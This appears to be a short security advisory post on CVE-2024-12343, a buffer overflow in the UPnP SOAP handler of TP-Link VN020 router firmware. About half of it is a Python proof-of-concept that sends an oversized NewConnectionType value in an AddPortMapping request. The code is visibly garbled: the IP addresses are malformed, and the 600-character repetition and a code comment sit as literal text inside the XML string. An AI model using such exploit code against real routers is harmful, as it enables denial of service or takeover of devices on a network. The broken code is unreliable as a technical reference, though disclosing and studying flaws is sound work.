A critical vulnerability (CVE-2024-12343) has been discovered in the TP-Link VN020 F3v(T) TT_V6.2.1021 firmware, which potentially allows attackers to exploit a buffer overflow in an unknown function within the /control/WANIPConnection file. This particular vulnerability lies in the SOAP Request Handler component and is triggered through the manipulation of the argument NewConnectionType. While the attack must be conducted within the local network, the exploit has already been publicly disclosed, making it a possible target for attackers.
Code Snippet
The following code snippet demonstrates the manipulation of the NewConnectionType argument, which leads to the buffer overflow vulnerability:
import requests
target_IP = "http://192.168..1"; # Replace with the target's IP address
URL = f"{target_IP}/control/WANIPConnection"
headers = {
"Content-Type": "text/xml",
"SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
}
payload = '''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">;
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>808</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>80</NewInternalPort>
<NewInternalClient>192.168..2</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>test</NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewConnectionType>A' * 600</NewConnectionType> # Creating an oversized payload
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
response = requests.post(URL, headers=headers, data=payload)
print(response.text)
Original References
1. CVE-2024-12343 - National Vulnerability Database
2. TP-Link VN020-F3v(T) TT_V6.2.1021 - 'NewConnectionType' Buffer Overflow - Exploit Database
Exploit Details
An attacker must be within the local network to exploit this vulnerability. By manipulating the 'NewConnectionType' argument, an attacker can cause a buffer overflow in the affected TP-Link device. This can lead to a Denial of Service (DoS) attack, making the router unresponsive, or could potentially result in the execution of arbitrary code on the router, granting an attacker full control of the device.
TP-Link is advised to release a firmware update that addresses this vulnerability and users are advised to update their devices' firmware as soon as the patch becomes available.
Timeline
Published on: 12/08/2024 10:15:04 UTC
Last modified on: 12/10/2024 23:26:52 UTC